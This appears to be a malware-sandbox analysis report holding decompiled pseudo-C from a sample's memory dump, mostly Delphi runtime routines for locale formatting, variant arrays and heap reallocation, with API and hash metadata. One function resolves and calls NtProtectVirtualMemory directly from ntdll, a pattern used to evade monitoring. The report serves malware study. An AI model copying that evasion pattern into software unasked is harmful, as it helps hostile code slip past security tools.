                                                                                                  
                                                                                                  				_t128 = __eflags;
                                                                                                  				_push(0);
                                                                                                  				_push(0);
                                                                                                  				_push(0);
                                                                                                  				_push(0);
                                                                                                  				_push(0);
                                                                                                  				_t122 = __edx;
                                                                                                  				_t124 = __eax;
                                                                                                  				_push(_t127);
                                                                                                  				_push(0x285acb4);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t127;
                                                                                                  				_t92 = 1;
                                                                                                  				E028544A0(__edx);
                                                                                                  				E0285A7A8(GetThreadLocale(), 0x285accc, 0x1009,  &_v12);
                                                                                                  				if(E02857AEC(0x285accc, 1, _t128) + 0xfffffffd - 3 < 0) {
                                                                                                  					while(1) {
                                                                                                  						__eflags = _t92 - E02854760(_t124);
                                                                                                  						if(__eflags > 0) {
                                                                                                  							break;
                                                                                                  						}
                                                                                                  						asm("bt [0x2877808], eax");
                                                                                                  						if(__eflags >= 0) {
                                                                                                  							_t45 = E028580A4(_t124 + _t92 - 1, 2, 0x285acd0);
                                                                                                  							__eflags = _t45;
                                                                                                  							if(_t45 != 0) {
                                                                                                  								_t47 = E028580A4(_t124 + _t92 - 1, 4, 0x285ace0);
                                                                                                  								__eflags = _t47;
                                                                                                  								if(_t47 != 0) {
                                                                                                  									_t49 = E028580A4(_t124 + _t92 - 1, 2, 0x285acf8);
                                                                                                  									__eflags = _t49;
                                                                                                  									if(_t49 != 0) {
                                                                                                  										_t51 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x59;
                                                                                                  										__eflags = _t51;
                                                                                                  										if(_t51 == 0) {
                                                                                                  											L24:
                                                                                                  											E0285476C(_t122, 0x285ad10);
                                                                                                  											L26:
                                                                                                  											_t92 = _t92 + 1;
                                                                                                  											__eflags = _t92;
                                                                                                  											continue;
                                                                                                  										}
                                                                                                  										__eflags = _t51 != 0x20;
                                                                                                  										if(_t51 != 0x20) {
                                                                                                  											E02854688();
                                                                                                  											E0285476C(_t122, _v24);
                                                                                                  											goto L26;
                                                                                                  										}
                                                                                                  										goto L24;
                                                                                                  									}
                                                                                                  									E0285476C(_t122, 0x285ad04);
                                                                                                  									_t92 = _t92 + 1;
                                                                                                  									goto L26;
                                                                                                  								}
                                                                                                  								E0285476C(_t122, 0x285acf0);
                                                                                                  								_t92 = _t92 + 3;
                                                                                                  								goto L26;
                                                                                                  							}
                                                                                                  							E0285476C(_t122, 0x285acdc);
                                                                                                  							_t92 = _t92 + 1;
                                                                                                  							goto L26;
                                                                                                  						}
                                                                                                  						_v8 = E0285BAC8(_t124, _t92);
                                                                                                  						E028549C4(_t124, _v8, _t92,  &_v20);
                                                                                                  						E0285476C(_t122, _v20);
                                                                                                  						_t92 = _t92 + _v8;
                                                                                                  					}
                                                                                                  					L28:
                                                                                                  					_pop(_t111);
                                                                                                  					 *[fs:eax] = _t111;
                                                                                                  					_push(0x285acbb);
                                                                                                  					return E028544C4( &_v24, 4);
                                                                                                  				}
                                                                                                  				_t75 =  *0x28a58d0; // 0x9
                                                                                                  				_t76 = _t75 - 4;
                                                                                                  				if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                                                                                  					_t77 = 1;
                                                                                                  				} else {
                                                                                                  					_t77 = 0;
                                                                                                  				}
                                                                                                  				if(_t77 == 0) {
                                                                                                  					E028544F4(_t122, _t124);
                                                                                                  				} else {
                                                                                                  					while(_t92 <= E02854760(_t124)) {
                                                                                                  						_t83 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x47;
                                                                                                  						__eflags = _t83;
                                                                                                  						if(_t83 != 0) {
                                                                                                  							__eflags = _t83 != 0x20;
                                                                                                  							if(_t83 != 0x20) {
                                                                                                  								E02854688();
                                                                                                  								E0285476C(_t122, _v16);
                                                                                                  							}
                                                                                                  						}
                                                                                                  						_t92 = _t92 + 1;
                                                                                                  						__eflags = _t92;
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}























                                                                                                  APIs
                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,0285ACB4,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0285AB13
                                                                                                    • Part of subcall function 0285A7A8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0285A7C6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Locale$InfoThread
                                                                                                  • String ID: eeee$ggg$yyyy
                                                                                                  • API String ID: 4232894706-1253427255
                                                                                                  • Opcode ID: 50f045933c01d92ecc292e344d8b3c856dc0bc998c356eaee27827067247b1d4
                                                                                                  • Instruction ID: 914ca61350613707ab5a24153bf7908bc8535ec09764557ea79ade852103836e
                                                                                                  • Opcode Fuzzy Hash: 50f045933c01d92ecc292e344d8b3c856dc0bc998c356eaee27827067247b1d4
                                                                                                  • Instruction Fuzzy Hash: FE41033C7045394BE719AAAD88C027EB7EBEB85304B944726DC41D7344EA39ED468A63
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 58%
                                                                                                  			E02867A60(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                  
                                                                                                  				 *0x28a631c = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtProtectVirtualMemory");
                                                                                                  				 *0x28a631c(_a4, _a8, _a12, _a16, _a20);
                                                                                                  				return 1;
                                                                                                  			}




                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 02867A6D
                                                                                                  • GetProcAddress.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 02867A73
                                                                                                  Strings
                                                                                                  • C:\Windows\System32\ntdll.dll, xrefs: 02867A68
                                                                                                  • NtProtectVirtualMemory, xrefs: 02867A63
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                                  • API String ID: 1646373207-1386159242
                                                                                                  • Opcode ID: 66a80842de05f775be95ddeed27e9a468ed250769ecb434d8f2ef2f2d8487a67
                                                                                                  • Instruction ID: cee9724bde74045f54dcd71d62cce7758e5031fdc82fb92df78ebe8950b55a2c
                                                                                                  • Opcode Fuzzy Hash: 66a80842de05f775be95ddeed27e9a468ed250769ecb434d8f2ef2f2d8487a67
                                                                                                  • Instruction Fuzzy Hash: 40E0B6BE640219AFDF40DE9CDC49E9B77EDAB1C6417444401BA19C7300D63AE9629FB1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0285C458() {
                                                                                                  				_Unknown_base(*)()* _t1;
                                                                                                  				struct HINSTANCE__* _t3;
                                                                                                  
                                                                                                  				_t1 = GetModuleHandleA("kernel32.dll");
                                                                                                  				_t3 = _t1;
                                                                                                  				if(_t3 != 0) {
                                                                                                  					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                                                                                  					 *0x287782c = _t1;
                                                                                                  				}
                                                                                                  				if( *0x287782c == 0) {
                                                                                                  					 *0x287782c = E02857FB8;
                                                                                                  					return E02857FB8;
                                                                                                  				}
                                                                                                  				return _t1;
                                                                                                  			}






                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0287610B,00000000,0287611E), ref: 0285C45E
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0285C46F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                  • API String ID: 1646373207-3712701948
                                                                                                  • Opcode ID: 1b1733ab3e507a9d4bdc21a83ab036f42c19c2a3170d5663f7cb39d59bd5c21b
                                                                                                  • Instruction ID: 6eda00ff5c3d0633e95021299f3b12ebca01cef4f55d0b5a08795f24a5b666d2
                                                                                                  • Opcode Fuzzy Hash: 1b1733ab3e507a9d4bdc21a83ab036f42c19c2a3170d5663f7cb39d59bd5c21b
                                                                                                  • Instruction Fuzzy Hash: 3CD09E6CA403355EE7105AB5EC84E3963D99709717F80C426E906D6241D7B5C498CFDD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 82%
                                                                                                  			E0285E1CC(signed short* __eax) {
                                                                                                  				char _v260;
                                                                                                  				char _v768;
                                                                                                  				char _v772;
                                                                                                  				signed short* _v776;
                                                                                                  				signed short* _v780;
                                                                                                  				char _v784;
                                                                                                  				signed int _v788;
                                                                                                  				char _v792;
                                                                                                  				intOrPtr* _v796;
                                                                                                  				signed char _t43;
                                                                                                  				intOrPtr* _t60;
                                                                                                  				void* _t79;
                                                                                                  				void* _t81;
                                                                                                  				void* _t84;
                                                                                                  				void* _t85;
                                                                                                  				intOrPtr* _t92;
                                                                                                  				void* _t96;
                                                                                                  				char* _t97;
                                                                                                  				void* _t98;
                                                                                                  
                                                                                                  				_v776 = __eax;
                                                                                                  				if((_v776[0] & 0x00000020) == 0) {
                                                                                                  					E0285E014(0x80070057);
                                                                                                  				}
                                                                                                  				_t43 =  *_v776 & 0x0000ffff;
                                                                                                  				if((_t43 & 0x00000fff) == 0xc) {
                                                                                                  					if((_t43 & 0x00000040) == 0) {
                                                                                                  						_v780 = _v776[4];
                                                                                                  					} else {
                                                                                                  						_v780 =  *(_v776[4]);
                                                                                                  					}
                                                                                                  					_v788 =  *_v780 & 0x0000ffff;
                                                                                                  					_t79 = _v788 - 1;
                                                                                                  					if(_t79 >= 0) {
                                                                                                  						_t85 = _t79 + 1;
                                                                                                  						_t96 = 0;
                                                                                                  						_t97 =  &_v772;
                                                                                                  						do {
                                                                                                  							_v796 = _t97;
                                                                                                  							_push(_v796 + 4);
                                                                                                  							_t22 = _t96 + 1; // 0x1
                                                                                                  							_push(_v780);
                                                                                                  							L0285D234();
                                                                                                  							E0285E014(_v780);
                                                                                                  							_push( &_v784);
                                                                                                  							_t25 = _t96 + 1; // 0x1
                                                                                                  							_push(_v780);
                                                                                                  							L0285D23C();
                                                                                                  							E0285E014(_v780);
                                                                                                  							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                                                                                                  							_t96 = _t96 + 1;
                                                                                                  							_t97 = _t97 + 8;
                                                                                                  							_t85 = _t85 - 1;
                                                                                                  						} while (_t85 != 0);
                                                                                                  					}
                                                                                                  					_t81 = _v788 - 1;
                                                                                                  					if(_t81 >= 0) {
                                                                                                  						_t84 = _t81 + 1;
                                                                                                  						_t60 =  &_v768;
                                                                                                  						_t92 =  &_v260;
                                                                                                  						do {
                                                                                                  							 *_t92 =  *_t60;
                                                                                                  							_t92 = _t92 + 4;
                                                                                                  							_t60 = _t60 + 8;
                                                                                                  							_t84 = _t84 - 1;
                                                                                                  						} while (_t84 != 0);
                                                                                                  						do {
                                                                                                  							goto L12;
                                                                                                  						} while (E0285E170(_t83, _t98) != 0);
                                                                                                  						goto L15;
                                                                                                  					}
                                                                                                  					L12:
                                                                                                  					_t83 = _v788 - 1;
                                                                                                  					if(E0285E140(_v788 - 1, _t98) != 0) {
                                                                                                  						_push( &_v792);
                                                                                                  						_push( &_v260);
                                                                                                  						_push(_v780);
                                                                                                  						L0285D244();
                                                                                                  						E0285E014(_v780);
                                                                                                  						E0285E3C4(_v792);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				L15:
                                                                                                  				_push(_v776);
                                                                                                  				L0285CDCC();
                                                                                                  				return E0285E014(_v776);
                                                                                                  			}























                                                                                                  APIs
                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0285E27B
                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0285E297
                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0285E30E
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0285E337
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                  • String ID:
                                                                                                  • API String ID: 920484758-0
                                                                                                  • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                  • Instruction ID: 4139d86a5351ba75ea971895f676a893b40f874f23d51f375acce6fa07ca3740
                                                                                                  • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                  • Instruction Fuzzy Hash: 4D41F47DA016299FCB62DF58CC90BD9B3BDAF48604F0041D5EA4DE7215DA30AF818F62
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0285AD20(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                                                                                                  				intOrPtr _v8;
                                                                                                  				intOrPtr _v12;
                                                                                                  				char _v273;
                                                                                                  				char _v534;
                                                                                                  				char _v790;
                                                                                                  				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                                                  				char _v824;
                                                                                                  				intOrPtr _v828;
                                                                                                  				char _v832;
                                                                                                  				intOrPtr _v836;
                                                                                                  				char _v840;
                                                                                                  				intOrPtr _v844;
                                                                                                  				char _v848;
                                                                                                  				char* _v852;
                                                                                                  				char _v856;
                                                                                                  				char _v860;
                                                                                                  				char _v1116;
                                                                                                  				void* __edi;
                                                                                                  				struct HINSTANCE__* _t40;
                                                                                                  				intOrPtr _t51;
                                                                                                  				struct HINSTANCE__* _t53;
                                                                                                  				void* _t69;
                                                                                                  				void* _t73;
                                                                                                  				intOrPtr _t74;
                                                                                                  				intOrPtr _t83;
                                                                                                  				intOrPtr _t86;
                                                                                                  				intOrPtr* _t87;
                                                                                                  				void* _t93;
                                                                                                  
                                                                                                  				_t93 = __fp0;
                                                                                                  				_v8 = __ecx;
                                                                                                  				_t73 = __edx;
                                                                                                  				_t87 = __eax;
                                                                                                  				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                                                  				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                                                                  					_t40 =  *0x28a57f8; // 0x2850000
                                                                                                  					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                                                  					_v12 = E0285AD14(_t73);
                                                                                                  				} else {
                                                                                                  					_v12 = _t73 - _v820.AllocationBase;
                                                                                                  				}
                                                                                                  				E02858070( &_v273, 0x104, E0285BC10( &_v534, 0x5c) + 1);
                                                                                                  				_t74 = 0x285aea0;
                                                                                                  				_t86 = 0x285aea0;
                                                                                                  				_t83 =  *0x2856a8c; // 0x2856ad8
                                                                                                  				if(E02853850(_t87, _t83) != 0) {
                                                                                                  					_t74 = E02854964( *((intOrPtr*)(_t87 + 4)));
                                                                                                  					_t69 = E02858048(_t74, 0x285aea0);
                                                                                                  					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                                                                                  						_t86 = 0x285aea4;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_t51 =  *0x28a2e04; // 0x2856874
                                                                                                  				_t16 = _t51 + 4; // 0xffe9
                                                                                                  				_t53 =  *0x28a57f8; // 0x2850000
                                                                                                  				LoadStringA(E02855874(_t53),  *_t16,  &_v790, 0x100);
                                                                                                  				E0285363C( *_t87,  &_v1116);
                                                                                                  				_v860 =  &_v1116;
                                                                                                  				_v856 = 4;
                                                                                                  				_v852 =  &_v273;
                                                                                                  				_v848 = 6;
                                                                                                  				_v844 = _v12;
                                                                                                  				_v840 = 5;
                                                                                                  				_v836 = _t74;
                                                                                                  				_v832 = 6;
                                                                                                  				_v828 = _t86;
                                                                                                  				_v824 = 6;
                                                                                                  				E02858590(_v8,  &_v790, _a4, _t93, 4,  &_v860);
                                                                                                  				return E02858048(_v8, _t86);
                                                                                                  			}
































                                                                                                  APIs
                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0285AD3D
                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0285AD61
                                                                                                  • GetModuleFileNameA.KERNEL32(02850000,?,00000105), ref: 0285AD7C
                                                                                                  • LoadStringA.USER32 ref: 0285AE12
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 3990497365-0
                                                                                                  • Opcode ID: 4342d5967bfdabb9ec3380043b41d5a98f135563103603af8547a6afcc393f45
                                                                                                  • Instruction ID: d204ddb52902fa547d88827894a6ac8b33a9207a17508e3688285a0c85b44c9f
                                                                                                  • Opcode Fuzzy Hash: 4342d5967bfdabb9ec3380043b41d5a98f135563103603af8547a6afcc393f45
                                                                                                  • Instruction Fuzzy Hash: AA412F7D9402689BDB21EB68CC84BDAB7FDAF08301F4041E5A948E7251DB74AF88CF51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 93%
                                                                                                  			E02851C6C(signed int __eax, signed int __edx, void* __edi) {
                                                                                                  				signed int _t58;
                                                                                                  				signed int _t73;
                                                                                                  				signed int _t80;
                                                                                                  				signed int _t86;
                                                                                                  				signed int _t94;
                                                                                                  				signed int _t100;
                                                                                                  				void* _t102;
                                                                                                  				signed int _t111;
                                                                                                  				signed int _t119;
                                                                                                  				signed int _t125;
                                                                                                  				signed int _t131;
                                                                                                  				signed int _t133;
                                                                                                  				signed int _t136;
                                                                                                  				intOrPtr _t139;
                                                                                                  				void* _t141;
                                                                                                  				signed int _t143;
                                                                                                  				signed int _t145;
                                                                                                  				unsigned int _t146;
                                                                                                  				signed int _t153;
                                                                                                  				unsigned int _t154;
                                                                                                  				intOrPtr _t157;
                                                                                                  				void* _t160;
                                                                                                  				intOrPtr _t168;
                                                                                                  				intOrPtr _t170;
                                                                                                  				signed int _t173;
                                                                                                  				signed int _t174;
                                                                                                  				signed int _t175;
                                                                                                  				void* _t182;
                                                                                                  				unsigned int _t184;
                                                                                                  				signed int _t190;
                                                                                                  				signed int _t193;
                                                                                                  				signed int _t195;
                                                                                                  				signed int _t196;
                                                                                                  				signed int _t198;
                                                                                                  				void* _t202;
                                                                                                  				signed int _t203;
                                                                                                  				signed int _t204;
                                                                                                  				void* _t205;
                                                                                                  				signed int _t208;
                                                                                                  
                                                                                                  				_t181 = __edi;
                                                                                                  				_t166 = __edx;
                                                                                                  				_t145 =  *(__eax - 4);
                                                                                                  				_t196 = __eax;
                                                                                                  				if((_t145 & 0x00000007) != 0) {
                                                                                                  					__eflags = _t145 & 0x00000005;
                                                                                                  					if((_t145 & 0x00000005) != 0) {
                                                                                                  						__eflags = _t145 & 0x00000003;
                                                                                                  						if((_t145 & 0x00000003) != 0) {
                                                                                                  							__eflags = 0;
                                                                                                  							return 0;
                                                                                                  						} else {
                                                                                                  							_t146 = _t145 - 0x18;
                                                                                                  							__eflags = __edx - _t146;
                                                                                                  							if(__edx <= _t146) {
                                                                                                  								__eflags = __edx - _t146 >> 1;
                                                                                                  								if(__edx < _t146 >> 1) {
                                                                                                  									_t131 = __edx;
                                                                                                  									_t58 = E02851724(__edx);
                                                                                                  									__eflags = _t58;
                                                                                                  									if(_t58 == 0) {
                                                                                                  										goto L61;
                                                                                                  									} else {
                                                                                                  										__eflags = _t131 - 0x40a2c;
                                                                                                  										if(_t131 > 0x40a2c) {
                                                                                                  											 *((intOrPtr*)(_t58 - 8)) = _t131;
                                                                                                  										}
                                                                                                  										E028514A4(_t196, _t131, _t58);
                                                                                                  										E02851A8C(_t196, _t181);
                                                                                                  										return _t58;
                                                                                                  									}
                                                                                                  								} else {
                                                                                                  									 *((intOrPtr*)(__eax - 8)) = __edx;
                                                                                                  									return __eax;
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								asm("adc eax, 0xffffffff");
                                                                                                  								_t133 = (0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx;
                                                                                                  								_push(__edx);
                                                                                                  								_t58 = E02851724((0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx);
                                                                                                  								_pop(_t168);
                                                                                                  								__eflags = _t58;
                                                                                                  								if(_t58 != 0) {
                                                                                                  									__eflags = _t133 - 0x40a2c;
                                                                                                  									if(_t133 > 0x40a2c) {
                                                                                                  										 *((intOrPtr*)(_t58 - 8)) = _t168;
                                                                                                  									}
                                                                                                  									E02851474(_t196,  *((intOrPtr*)(_t196 - 8)), _t58);
                                                                                                  									E02851A8C(_t196, _t181);
                                                                                                  									return _t58;
                                                                                                  								}
                                                                                                  								L61:
                                                                                                  								return _t58;
                                                                                                  							}
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						_t153 = _t145 & 0xfffffff0;
                                                                                                  						_push(__edi);
                                                                                                  						_t182 = _t153 + __eax;
                                                                                                  						_t154 = _t153 - 4;
                                                                                                  						_t136 = _t145 & 0x0000000f;
                                                                                                  						__eflags = __edx - _t154;
                                                                                                  						if(__edx > _t154) {
                                                                                                  							_t73 =  *(_t182 - 4);
                                                                                                  							__eflags = _t73 & 0x00000001;
                                                                                                  							if((_t73 & 0x00000001) == 0) {
                                                                                                  								L51:
                                                                                                  								asm("adc edi, 0xffffffff");
                                                                                                  								_t198 = ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166;
                                                                                                  								_t184 = _t154;
                                                                                                  								_t80 = E02851724(((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166);
                                                                                                  								_t170 = _t166;
                                                                                                  								__eflags = _t80;
                                                                                                  								if(_t80 == 0) {
                                                                                                  									goto L49;
                                                                                                  								} else {
                                                                                                  									__eflags = _t198 - 0x40a2c;
                                                                                                  									if(_t198 > 0x40a2c) {
                                                                                                  										 *((intOrPtr*)(_t80 - 8)) = _t170;
                                                                                                  									}
                                                                                                  									E02851474(_t196, _t184, _t80);
                                                                                                  									E02851A8C(_t196, _t184);
                                                                                                  									return _t80;
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								_t86 = _t73 & 0xfffffff0;
                                                                                                  								_t202 = _t154 + _t86;
                                                                                                  								__eflags = __edx - _t202;
                                                                                                  								if(__edx > _t202) {
                                                                                                  									goto L51;
                                                                                                  								} else {
                                                                                                  									__eflags =  *0x28a304d;
                                                                                                  									if(__eflags == 0) {
                                                                                                  										L42:
                                                                                                  										__eflags = _t86 - 0xb30;
                                                                                                  										if(_t86 >= 0xb30) {
                                                                                                  											E028514C0(_t182);
                                                                                                  											_t166 = _t166;
                                                                                                  											_t154 = _t154;
                                                                                                  										}
                                                                                                  										asm("adc edi, 0xffffffff");
                                                                                                  										_t94 = (_t166 + ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
                                                                                                  										_t173 = _t202 + 4 - _t94;
                                                                                                  										__eflags = _t173;
                                                                                                  										if(_t173 > 0) {
                                                                                                  											 *(_t196 + _t202 - 4) = _t173;
                                                                                                  											 *((intOrPtr*)(_t196 - 4 + _t94)) = _t173 + 3;
                                                                                                  											_t203 = _t94;
                                                                                                  											__eflags = _t173 - 0xb30;
                                                                                                  											if(_t173 >= 0xb30) {
                                                                                                  												__eflags = _t94 + _t196;
                                                                                                  												E02851500(_t94 + _t196, _t154, _t173);
                                                                                                  											}
                                                                                                  										} else {
                                                                                                  											 *(_t196 + _t202) =  *(_t196 + _t202) & 0xfffffff7;
                                                                                                  											_t203 = _t202 + 4;
                                                                                                  										}
                                                                                                  										_t204 = _t203 | _t136;
                                                                                                  										__eflags = _t204;
                                                                                                  										 *(_t196 - 4) = _t204;
                                                                                                  										 *0x28a3718 = 0;
                                                                                                  										_t80 = _t196;
                                                                                                  										L49:
                                                                                                  										return _t80;
                                                                                                  									} else {
                                                                                                  										while(1) {
                                                                                                  											asm("lock cmpxchg [0x28a3718], ah");
                                                                                                  											if(__eflags == 0) {
                                                                                                  												break;
                                                                                                  											}
                                                                                                  											Sleep(0);
                                                                                                  											_t166 = _t166;
                                                                                                  											_t154 = _t154;
                                                                                                  											asm("lock cmpxchg [0x28a3718], ah");
                                                                                                  											if(__eflags != 0) {
                                                                                                  												Sleep(0xa);
                                                                                                  												_t166 = _t166;
                                                                                                  												_t154 = _t154;
                                                                                                  												continue;
                                                                                                  											}
                                                                                                  											break;
                                                                                                  										}
                                                                                                  										_t136 = 0x0000000f &  *(_t196 - 4);
                                                                                                  										_t100 =  *(_t182 - 4);
                                                                                                  										__eflags = _t100 & 0x00000001;
                                                                                                  										if((_t100 & 0x00000001) == 0) {
                                                                                                  											L50:
                                                                                                  											 *0x28a3718 = 0;
                                                                                                  											goto L51;
                                                                                                  										} else {
                                                                                                  											_t86 = _t100 & 0xfffffff0;
                                                                                                  											_t202 = _t154 + _t86;
                                                                                                  											__eflags = _t166 - _t202;
                                                                                                  											if(_t166 > _t202) {
                                                                                                  												goto L50;
                                                                                                  											} else {
                                                                                                  												goto L42;
                                                                                                  											}
                                                                                                  										}
                                                                                                  									}
                                                                                                  								}
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							_t205 = __edx + __edx;
                                                                                                  							__eflags = _t205 - _t154;
                                                                                                  							if(_t205 < _t154) {
                                                                                                  								__eflags = __edx - 0xb2c;
                                                                                                  								if(__edx >= 0xb2c) {
                                                                                                  									L19:
                                                                                                  									_t16 = _t166 + 0xd3; // 0xbff
                                                                                                  									_t208 = (_t16 & 0xffffff00) + 0x30;
                                                                                                  									_t157 = _t154 + 4 - _t208;
                                                                                                  									__eflags =  *0x28a304d;
                                                                                                  									if(__eflags != 0) {
                                                                                                  										while(1) {
                                                                                                  											asm("lock cmpxchg [0x28a3718], ah");
                                                                                                  											if(__eflags == 0) {
                                                                                                  												break;
                                                                                                  											}
                                                                                                  											Sleep(0);
                                                                                                  											_t157 = _t157;
                                                                                                  											asm("lock cmpxchg [0x28a3718], ah");
                                                                                                  											if(__eflags != 0) {
                                                                                                  												Sleep(0xa);
                                                                                                  												_t157 = _t157;
                                                                                                  												continue;
                                                                                                  											}
                                                                                                  											break;
                                                                                                  										}
